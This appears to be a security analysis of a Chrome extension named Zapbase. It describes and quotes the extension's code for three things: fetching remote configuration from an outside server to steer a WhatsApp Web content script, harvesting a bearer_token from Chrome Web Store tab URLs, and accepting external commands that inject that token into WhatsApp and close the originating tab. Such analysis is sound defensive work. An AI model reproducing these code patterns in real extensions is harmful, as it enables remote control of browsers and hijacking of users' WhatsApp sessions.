Zapbase

Every 10 minutes (alarm 'Ten_Minutes', line 240) the extension fetches a JSON payload from the remote server https://code.wascript.com.br/config.json and forwards the entire response object to the WhatsApp Web content script as 'Update_DomSelector'. The remote server can modify the object's contents at any time without a CWS update, effectively enabling server-side control of content-script behaviour. The response also contains a 'remote_code' field (extracted at line 378) that points to additional remote assets, extending the attack surface beyond simple config updates.

const f = async () => {  try {    const t = await (await fetch(`${n.remote_code}config.json`, {        method: "GET"      }))      .json();    return s("https://web.whatsapp.com/*", "Update_DomSelector", t), t;  } catch (e) {    return console.error("Erro ao buscar configurações externas:", e), null;  }};

At install time, the extension queries all open Chrome Web Store tabs, extracts a 'bearer_token' query parameter from their URLs (line 136), and opens WhatsApp Web as https://web.whatsapp.com?bearer_token=${token} (line 109). The same navigation is triggered by external messages from app.wascript.com.br (externally_connectable, line 57 manifest). Appending an opaque token to the WhatsApp URL is the documented WaSteal credential-injection vector: the content script can read this URL parameter and relay it to the remote backend to authenticate against the victim's WhatsApp session.

async function y() {  const e = "*://chromewebstore.google.com/*";  try {    const t = await chrome.tabs.query({      url: e    });    if (t.length === 0)      return {        success: !1,        bearer_token: ""      };    for (const o of t)      if (o.url)        try {          const r = new URL(o.url).searchParams.get("bearer_token");          if (r)            return {              success: !0,              bearer_token: r            };        } catch (a) {          console.warn(`Erro ao processar a URL da aba ${o.id}:`, a);        }    return {      success: !1,      bearer_token: ""    };  } catch (t) {    return console.error("Erro ao consultar as abas do Chrome:", t), {      success: !1,      bearer_token: ""    };  }}

The extension registers an external message listener that accepts commands from https://app.wascript.com.br and https://dev.watools.com.br (manifest externally_connectable). The 'user_auth' action navigates WhatsApp to a URL embedding the caller-supplied bearer_token and can close the originating tab (removing the evidence tab from the victim's browser). This allows the remote operator's web application to trigger WhatsApp session injection at will, without any user interaction after the extension is installed.

L = () => {  chrome.runtime.onMessageExternal.addListener(async (e, t, o) => {    switch (e.action) {      case "is_instaled":        o({          success: !0        });        break;      case "open_whatsapp":        b(e.bearer);        break;      case "user_auth":        b(e.bearer_token), e.close_painel && t.tab && t.tab.id && setTimeout(() => {          chrome.tabs.remove(t.tab.id);        }, 100);        break;    }    return !0;  });};